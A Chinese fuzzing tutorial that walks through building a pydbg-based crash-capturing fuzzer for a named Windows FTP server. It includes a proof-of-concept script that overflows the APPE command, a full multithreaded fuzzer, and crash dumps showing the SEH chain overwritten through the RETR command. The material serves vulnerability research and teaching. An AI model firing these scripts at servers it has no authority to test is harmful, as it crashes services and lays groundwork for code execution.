提起模糊测试时我们在说什么

0x00 基础知识

一:区分

我们常说的漏洞挖掘,大致可以分为两种模式:白盒、黑盒.

1.白盒,又称透明盒测试,指我们清楚的了解程序的逻辑,获得设计思路,说明文档,源代码的情况下进行的测试.

优点:准确率高,定位到可能存在的漏洞位置处,能清楚的看到前后逻辑.缺点:过于复杂,在代码量巨大的情况下,手工寻找要付出相当的精力,网传winNt4.0泄露过源码,但并未出现因该次泄露而导致的漏洞.

2.黑盒,又称功能测试,指在完全不了解内部信息的情况下进行碰撞测试

优点:可用性、重现性高,完全针对功能的测试,不同于白盒,在源码中实现漏洞函数细节但并未调用的情况,编译器会优化掉这个函数,也就是这个功能并不可用.缺点:高误报,捕捉异常麻烦

二:fuzz的局限性

我们根据自己的经验编写相应的规则,白盒时,例如搜索gets、strcpy、fgets、memcpy等函数,然后向上回溯,如上所说,有可能函数并未调用过,亦或在上层调用之前已经做了限制,例如:

#!c #include <string.h> void test(char *arr){     char buffer[10];     strcpy(buffer,arr); }  int main(int argc,char **argv){     if(length(argv[1])<=10)         test(argv[1]); } 

在黑盒时,例如出现越权漏洞、作者自留后门、多阶漏洞,我们手工测试可以精准的判断,换成程序的视角,这就是一个正常的功能,造成误报

0x01 fuzz的各阶段

1. 确定目标
2. 细化规则确定发包数据
3. 发包
4. 异常捕获
5. hook api定位poc

一:模糊测试器的类型

常见的有命令行参数fuzz、环境变量fuzz、文件fuzz、网络协议fuzz、内存fuzz等

命令行参数就是上面的代码例子,环境变量fuzz,这个就是getenv("aaa"); 两种思路,不停的重写aaa变量的值和重启目标程序,第二点是必须的,第一点的改进思路hook getenv,重新实现一个getenv函数.

文件fuzz:覆盖性的写入数据,如果不读文件格式的说明文档,按字节覆盖,工作量巨大,有些文件格式会进行CRC效验,例如png文件格式.就像溢出保护的/gs选项.

网络协议fuzz:协议即传输数据的标准,数据本质上是01,根据协议对每个位置的划分来确定不同位置数据的意义,我们把这些位置称为块,块内的数据以key:value的方式存储,像是堆块中块首一样,有特定的位置标注数据的大小,client按协议格式发包后,server端根据协议解析,假如随意修改了数据却没有修改块大小,server端就无法正确识别数据.

协议也分两种:简单文本协议、二进制协议

简单协议通讯的数据在可打印字符范围内,人工可阅读,例如ftp、http协议

#!bash [[email protected]

~]# nc www.xxx.com 80 GET / HTTP/1.1 Host: xxx.com Referrer: google.com User-Agent: wooyun HTTP/1.1 200 OK ...

复杂如tcp/ip协议的NBNS,wireshark本身支持的协议比较多,或是本身公开或是逆向工程,将数据解析成肉眼可阅读的格式.

当面对复杂且闭源的协议,对其fuzz首要工作就是逆向工程,为此出现了内存形式的fuzz,直接在程序的内存空间里进行模糊测试

有如上代码,无限循环接受请求,在内存空间定位到parse之前插入数据而不必关心数据在recv之前是如何封装的,缺陷就是漏洞场景可能无法重现

二:细化规则和发包

除去内存fuzz,发包方式分两种:直接发送跟代理发送.第二种也叫启发式fuzz,wireshark可解析的情况下,针对特定字段fuzz

流程图如下:

本文以简单协议的ftp fuzz为例,瓶颈出现在发包过程中,要考虑server端的带宽和上游isp的响应速度,好在可以把server部署在本地.

以覆盖缓冲区为目的,截取不同长度的数据来发包,数据内容不能出现在用户层的内存地址,

我们喜闻乐见的栈溢出发生时会抛出内存地址读取或写入违例的异常,假如eip指向用户层内的地址可能不会抛出异常.

这里我们就用一串A来测试.

三:异常捕获

设想我们有一个长度为10的数组,数组内每组数据长度不同,以递增方式存储,假设第4组数据长度刚好溢出缓冲区抛出异常,模糊测试器没有异常捕获功能,直到发包完毕后才停止,那么我们只能确定测试目标存在漏洞,如何精准定位数据长度呢?

常见的捕获方式有三种:

1. 监视事件日志.
2. 心跳包检测.
3. 调试器

大多数情况我们推荐用成熟的调试器(例如OD)attach目标程序,程序崩溃时能清楚的观察上下文,堆栈回溯定位漏洞位置,配合wireshark能清楚的看到发包数据,或者在模糊测试器内嵌异常捕获功能:

1. CreateProcessA包含Debug_PROCESS标志来创建调试态的程序,WaitForDebugEvent获取信号,程序触发异常会发送信号给模糊测试器
2. DebugActiveProcess附加到相应进程上,同WaitForDebugEvent,再另外起线程去发包

DEBUG_EVENT结构:

#!c typedef struct _DEBUG_EVENT {   DWORD dwDebugEventCode;   DWORD dwProcessId;   DWORD dwThreadId;   union {     EXCEPTION_DEBUG_INFO Exception;     CREATE_THREAD_DEBUG_INFO CreateThread;     CREATE_PROCESS_DEBUG_INFO CreateProcessInfo;     EXIT_THREAD_DEBUG_INFO ExitThread;     EXIT_PROCESS_DEBUG_INFO ExitProcess;     LOAD_DLL_DEBUG_INFO LoadDll;     UNLOAD_DLL_DEBUG_INFO UnloadDll;     OUTPUT_DEBUG_STRING_INFO DebugString;     RIP_INFO RipInfo;   } u; } DEBUG_EVENT,   *LPDEBUG_EVENT; 

dwDebugEventCode值信息

#!bash 1 u.Exception 2 u.Create Thread 3 u.CreateProcessInfo 4 u.ExitThread 5 u.ExitProcess 6 u.LoadDll 7 u.UnloadDll 8 u.DebugString 9 u.RipInfo 

无限循环,WaitForDebugEvent每隔100毫秒获取一次调试信号,捕捉到异常信号并处理完毕后,ContinueDebugEvent允许线程继续执行.ContinueDebugEvent DBG_CONTINUE将控制权还给进程,DBG_EXCEPTION_NOT_HANDLED相反

看起来实现了一个不优雅的回调

#!c //some code void OnException(const EXCEPTION_DEBUG_INFO*); BOOL waitEvent = TRUE; DEBUG_EVENT debugEvent; while (waitEvent == TRUE && WaitForDebugEvent(&debugEvent, 100)) {      switch (debugEvent.dwDebugEventCode) {         case EXCEPTION_DEBUG_EVENT:             OnException(&debugEvent.u.Exception);             break;          default:             std::wcout << TEXT("Unknown debug event.") << std::endl;             break;         }     if (waitEvent == TRUE) {         ContinueDebugEvent(debugEvent.dwProcessId, debugEvent.dwThreadId, DBG_CONTINUE);     }     else {         break;     } } //some code 

每种调试事件的具体信息用u来索引,例如dwDebugEventCode值为1,那么就是u.Exception,EXCEPTION_DEBUG_INFO结构中dwFirstChange用来判断首轮异常还是末轮异常,dwFirstChange不为零,代表首轮,这意味着触发异常时程序中的异常处理器还未接管.

如下代码,假如此处strcpy发生溢出,但忽略了首轮异常,except进行了处理,我们的调试器就无法捕捉

#!c void test(){     __try{         strcpy(aaa,bbb);     }     __except(...){         printf(...);     } } 

之后还有获取上下文动作、读取内存动作、栈展开等,毫无疑问要花费相当的精力,幸运的pydbg模块已经帮封装了大多数的功能.

pydbg的安装网上有教程,我这里用python2.7.8 32bit正常安装

python -m pydoc pydbg 或者 help(pydbg) 查看相关介绍.

测试软件用的光刃前辈之前挖掘的"守望迷你ftp服务器"漏洞,测试exp:

#!python import sys,socket  def main():     ip,port,user,password=sys.argv[1:]     shellcodeTest=['A'*500]     s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)     connect=s.connect((ip,int(port)))     s.recv(4096)     s.send('USER'+' '+str(user)+'/r/n')     s.recv(4096)     s.send('PASS'+' '+str(password)+'/r/n')     s.recv(4096)     s.send('APPE'+' '+shellcodeTest[0]+'/r/n')     s.recv(4096)     s.send('QUIT'+' '+'/r/n')     s.close()  if __name__ == '__main__':     main() 

先捕捉异常试一下,test code:

#!python #!/usr/bin/env python # -*- coding:utf-8 -*- from pydbg import * from pydbg.defines import * import utils import sys  def accessViolationCallback(debugger):     if debugger.dbg.u.Exception.dwFirstChance:          print debugger.disasm(debugger.context.Eip)         #debugger.terminate_process()         return DBG_EXCEPTION_NOT_HANDLED         #if DBG_EXCEPTION_NOT_HANDLED then seh->veh->kill   def main():     debugger=pydbg()     flag=0     targetProgramName=u'守望迷你ftp服务器.exe'      #enumerate process.filter target ftp program     for (pid, name ) in debugger.enumerate_processes():         if name ==targetProgramName.encode('gbk') :             # name.encode('gbk')... windows font format.. you know...             debugger.attach(pid)             flag=1             print "[*] attaching to program with pid %d " %pid      if flag==0:         print "[*] target program not found/n"         sys.exit(-1)     debugger.set_callback(EXCEPTION_ACCESS_VIOLATION, accessViolationCallback)     #raise EXCEPTION_ACCESS_VIOLATION,Callback "accessViolationCallback" func     debugger.run()   if __name__ == '__main__':     main() 

看效果:

上面的utils模块的功能就是记录当前线程的状态,包括异常类型、上下文、异常地址、栈展开、seh链等

捕捉首轮异常的第一个异常(下一个异常覆盖eip,现在已经覆盖了seh chain),创建一个实例后,record_crash打印线程状态概要信息,terminate_process结束进程

#!python def crashInfo(debugger):     crash_bin = utils.crash_binning.crash_binning()     crash_bin.record_crash(debugger)     return crash_bin.crash_synopsis()   def accessViolationCallback(debugger):     if debugger.dbg.u.Exception.dwFirstChance:          print debugger.disasm(debugger.context.Eip)         print crashInfo(debugger)         debugger.terminate_process()         return DBG_EXCEPTION_NOT_HANDLED         #if DBG_EXCEPTION_NOT_HANDLED then seh->veh->kill 

查看效果

#!bash [*] attaching to program with pid 476 mov [edi],edx msvcrt.dll:77c12131 mov [edi],edx from thread 1708 caused access violati when attempting to write to 0x00130000  CONTEXT DUMP   EIP: 77c12131 mov [edi],edx   EAX: 7efefefe (2130640638) -> N/A   EBX: 00000000 (         0) -> N/A   ECX: 0012fe0c (   1244684) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (stack)   EDX: 41414141 (1094795585) -> N/A   EDI: 0012ffff (   1245183) -> Actx L| 4d[IY-2(0pSsHd,,ZZ (stack)   ESI: 030e88b8 (  51284152) -> C:/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)   EBP: 0012dbf8 (   1235960) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (stack)   ESP: 0012d7e8 (   1234920) -> RAhfC:/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAA (stack)   +00: 00000000 (         0) -> N/A   +04: 00410952 (   4262226) -> uEuuPVr;uEu^^EuPuuV;Et&9_ u!hQuuVujW3;t} '+=HiujW3Et1u}VW!VhQjVuS)VsE$Eu (守望迷你ftp服务器.exe.data)   +08: 0012d9f8 (   1235448) -> AAAC:/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (stack)   +0c: 0012d804 (   1234948) -> C:/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (stack)   +10: 00de6668 (  14575208) -> fgh_uasortTH_GREGOR`TTbR=CRG9^ATRRhfaOPg TH_GREGOR`TTbRWCR (heap)   +14: 00000000 (         0) -> N/A  disasm around:         0x77c1211b jz 0x77c12136         0x77c1211d mov dl,[ecx]         0x77c1211f inc ecx         0x77c12120 test dl,dl         0x77c12122 jz 0x77c12188         0x77c12124 mov [edi],dl         0x77c12126 inc edi         0x77c12127 test ecx,0x3         0x77c1212d jnz 0x77c1211d         0x77c1212f jmp 0x77c12136         0x77c12131 mov [edi],edx         0x77c12133 add edi,0x4         0x77c12136 mov edx,0x7efefeff         0x77c1213b mov eax,[ecx]         0x77c1213d add edx,eax         0x77c1213f xor eax,0xffffffff         0x77c12142 xor eax,edx         0x77c12144 mov edx,[ecx]         0x77c12146 add ecx,0x4         0x77c12149 test eax,0x81010100         0x77c1214e jz 0x77c12131  SEH unwind:         41414141 -> [INVALID]:41414141 Unable to disassemble at 41414141         ffffffff -> [INVALID]:ffffffff Unable to disassemble at ffffffff 

四:hook api实现数据包打印

首先查看是用的哪个dll的导出函数

这里可以看到用了ws2_32和wsock32,hook wsock32 recv

0x71A42E9E位置调用了ws2_32的WSARecv函数,bp ws2_32.WSARecv

查看数据包结尾标志,这里是'/x0D',读内存代码大致如下:

#!python buffer='' while 1:     byte = dbg.read_process_memory( aaa + offset, 1 )     if byte != '/x0D':         buffer  += byte         offset  += 1         continue     else:         break print buffer 

看WSARecv的结构

#!c int WSARecv(   _In_    SOCKET                             s,   _Inout_ LPWSABUF                           lpBuffers,   _In_    DWORD                              dwBufferCount,   _Out_   LPDWORD                            lpNumberOfBytesRecvd,   _Inout_ LPDWORD                            lpFlags,   _In_    LPWSAOVERLAPPED                    lpOverlapped,   _In_    LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); 

断在WSARecv上

lpOverlapped is null,那么就是说为阻塞式,可以直接hook

跟踪recv

在recv结束后ebx的值为BUFFER,缓冲区的数据会写入BUFFER指向的位置,所以在该api结束时callback即可

func_resolve_debug获得地址,创建一个container容器,源码上有example:

hook参数格式:hook.add(pydbg实例,要钩住的api,地址,接受的参数数量,调用时的callback,结束时的callback)

发包USER 1 PASS 1 APPE AAAAA效果如下:

现在加上发包行为,当程序溢出时,最后一个打印出来的包就是poc了

发500长度数据包,hook recv,打印最后poc,然后覆盖缓冲区,触发异常,看效果:

现在需要做的就是在程序内内嵌一个发包动作了

五:发包

这里要注意win下多线程socket recv的问题,假如非阻塞的情况,接受不到数据就会触发异常.

可能是由于多线程的原因,读内存时偶尔会触发bug,想来是A线程读内存时B线程在相同的位置进行写入动作,本来嘛,python多线程就不是同步的,加上ReadProcessMemory和WriteProcessMemory应该有锁,我又给每个线程加上了休眠动作,感觉应该可以了,结果gg... 最后在读内存语句加上了互斥锁才得以解决.

重要的地方都注释了,完整的代码:

#!python #!/usr/bin/env python # -*- coding:utf-8 -*- try:     from pydbg import *     from pydbg.defines import *     import utils except:     print 'pydbg or utils install error' from ctypes import * import sys import random import socket import getopt import Queue import threading import time  gLock=threading.Lock() #global mutex lock  def crashInfo(debugger):     crash_bin = utils.crash_binning.crash_binning()     crash_bin.record_crash(debugger)     return crash_bin.crash_synopsis()   def accessViolationCallback(debugger):     if debugger.dbg.u.Exception.dwFirstChance:          print debugger.disasm(debugger.context.Eip)         print crashInfo(debugger)         debugger.terminate_process()         return DBG_EXCEPTION_NOT_HANDLED         #if DBG_EXCEPTION_NOT_HANDLED then seh->veh->kill   def loadDllCallback(debugger):     global hooks,flag     if flag:         hookAddress=debugger.func_resolve_debuggee('ws2_32.dll','WSARecv')         #getModuleHandleA -> getProcAddress -> closeHandle          if hookAddress:             hooks.add(debugger,hookAddress,4,exit_hook=readProcessMemory)             print '[*] hook ws2_32.dll revc 0x%08x success/n' % hookAddress             flag=0     return DBG_CONTINUE  def readProcessMemory(debugger,args,ret):     #time.sleep(random.uniform(0,0.05))     try:         print '[*] recving.../n'         buffer  = ""         offset  = 0         ebxAddress=debugger.context.Ebx         #the recv after get ebx address          while 1:             gLock.acquire()             #threading read memory + write memory can error,so use mutex             byte = debugger.read_process_memory( ebxAddress + offset, 1 )             gLock.release()              if byte!='/x0D':                 buffer  += byte                 offset  += 1                 continue             else:                 break     except:         pass     print buffer     return DBG_CONTINUE  def initialiationThread(ip,user,password,port):      fuzzCommand=['LIST','APPE','RAW','RSET','XPWD','ALLO',         'CWD','ACCT','CDUP','DELE','HELP','MKD','MODE','NLST',         'NOOP','PASV','PORT','PWD','XRMD','RETR','RMD','RNFR',         'RNTO','SITE','SMNT','STOR','STRU','SYST','TYPE','AUTH',         'HOST','LANG','MDTM','OPTS','SIZE CHMOD','SIZE CHOWN','SIZE EXEC',         'SITE INDEX','SIZE PSWD','SIZE ZONE','SIZE WHO','XCUP','XCWD']     queue=Queue.Queue()     [queue.put(i) for i in fuzzCommand]       threadList=[]     for i in xrange(0,20):         t=threading.Thread(target=multiThread,args=(queue,ip,user,password,port,))         threadList.append(t)     for i in threadList:         i.start()     for i in threadList:         i.join(random.uniform(0,0.03))   def multiThread(queue,ip,user,password,port):     #time.sleep(random.uniform(1,3))     time.sleep(10)     #sleep 10s ,control -> main,else recv raise except      bufferString=['A'*25*(i+1) for i in xrange(30)]     try:         s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)         connect=s.connect((ip,int(port)))         print 'ccccccccc'         s.recv(1024)           while not queue.empty():             #if queue is null, not while conditional,then GIL pause.             ftpCommand=queue.get(block=False)             for i in bufferString:                 s.send('USER'+' '+str(user)+'/r/n')                 s.recv(1024)                 s.send('PASS'+' '+str(password)+'/r/n')                 s.recv(1024)                 s.send(ftpCommand+' '+i+'/r/n')                 s.recv(1024)        except socket.error,Queue.Empty:         #queue.queue.clear()         print 'ftp didn/'t response'     except Exception,e:         print e     finally:         s.close()         #because other thread may not spark except,so finally s.close()  def getArgv():     try:         options,args = getopt.getopt(sys.argv[1:],'hi:u:p:P:',['help','ip=','user=','pass=','port='])         if len(options)==0:             raise Exception     except Exception,e:         usage()      for name,value in options:         if name in ('-h','--help'):             usage()         if name in ('-i','--ip'):             ip=value         if name in ('-u','--user'):             user=value         if name in ('-p','--pass'):             password=value         if name in ('-P','--port'):             port=value     initialiationThread(ip,user,password,port)   def usage():      print '[*] python fuzz.py -i 127.0.0.1 -u test -p test -P 21'     print '[*] python fuzz.py --ip 127.0.0.1 --user test --pass test --port 21'     print '[*] thanks bstaint'     print '[*] author pr0mise'     sys.exit(-1)  def main():     getArgv()      print '/n'     debugger=pydbg()     targetProgramName=u'守望迷你ftp服务器.exe'     global hooks,flag     flag=0     hooks = utils.hook_container()       #enumerate process.filter target ftp program     for (pid, name ) in debugger.enumerate_processes():         if name ==targetProgramName.encode('gbk') :             # name.encode('gbk')... windows font format.. you know...             debugger.attach(pid)             flag=1             print '[*] attaching to program with pid %d ' %pid      if flag==0:         print '[*] target program not found/n'         sys.exit(-1)     debugger.set_callback(EXCEPTION_ACCESS_VIOLATION, accessViolationCallback)     #raise EXCEPTION_ACCESS_VIOLATION,Callback "accessViolationCallback" func      debugger.set_callback(LOAD_DLL_DEBUG_EVENT, loadDllCallback)     #the LoadLibrary('dll') after callback loadDllCallback func      debugger.run()    if __name__ == '__main__':     main() 

执行:

#!bash RETR mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmm mov [edi],edx msvcrt.dll:77c12131 mov [edi],edx from thread 692 caused access violation when attempting to write to 0x00130000  CONTEXT DUMP   EIP: 77c12131 mov [edi],edx   EAX: 7efefefe (2130640638) -> N/A   EBX: 00000000 (         0) -> N/A   ECX: 0012fe0c (   1244684) -> mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmC:/mm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm (stack)   EDX: 6d6d6d6d (1835887981) -> N/A   EDI: 0012ffff (   1245183) -> Actx L| 4d[IY-2(0pSsHd,,ZZ (stack)   ESI: 030f4cf8 (  51334392) -> C:/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm (heap)   EBP: 0012decc (   1236684) -> mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm (stack)   ESP: 0012dabc (   1235644) -> RAhfC:/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmm (stack)   +00: 00000000 (         0) -> N/A   +04: 00410952 (   4262226) -> uEuuPVr;uEu^^EuPuuV;Et&9_ u!hQuuVujW3;t}EwEuPEP '+=HiujW3Et1u}VW!VhQjVuS)VsE$Eu (守望迷你ftp服务器.exe.data)   +08: 0012dccc (   1236172) -> mmmC:/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm (stack)   +0c: 0012dad8 (   1235672) -> C:/mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm (stack)   +10: 00de6668 (  14575208) -> fgh_uasortTH_GREGOR`TTbR=CRG9^ATRRhfaOPggfuksor TH_GREGOR`TTbRWCR (heap)   +14: 00000000 (         0) -> N/A  disasm around:         0x77c1211b jz 0x77c12136         0x77c1211d mov dl,[ecx]         0x77c1211f inc ecx         0x77c12120 test dl,dl         0x77c12122 jz 0x77c12188         0x77c12124 mov [edi],dl         0x77c12126 inc edi         0x77c12127 test ecx,0x3         0x77c1212d jnz 0x77c1211d         0x77c1212f jmp 0x77c12136         0x77c12131 mov [edi],edx         0x77c12133 add edi,0x4         0x77c12136 mov edx,0x7efefeff         0x77c1213b mov eax,[ecx]         0x77c1213d add edx,eax         0x77c1213f xor eax,0xffffffff         0x77c12142 xor eax,edx         0x77c12144 mov edx,[ecx]         0x77c12146 add ecx,0x4         0x77c12149 test eax,0x81010100         0x77c1214e jz 0x77c12131  SEH unwind:         6d6d6d6d -> [INVALID]:6d6d6d6d Unable to disassemble at 6d6d6d6d         ffffffff -> [INVALID]:ffffffff Unable to disassemble at ffffffff   ftp didn't response ftp didn't response ftp didn't response 

可以看到fuzz出RETR命令发送长数据包可导致溢出,前面的文章介绍过,配合mona找到刚好覆盖到seh chain的位置,改一下exp.py就可以执行shellcode了.

文章到此结束,纰漏之处 欢迎诸君批评、斧正.

特别感谢bstaint表哥和赵中老师的帮助.

0x02 参考文档

• 《模糊测试-强制发觉安全漏洞的利器》
• 《python灰帽子》
• http://pedramamini.com/PaiMei/heap_trace/hook_container.py
• http://bbs.pediy.com/showthread.php?t=151870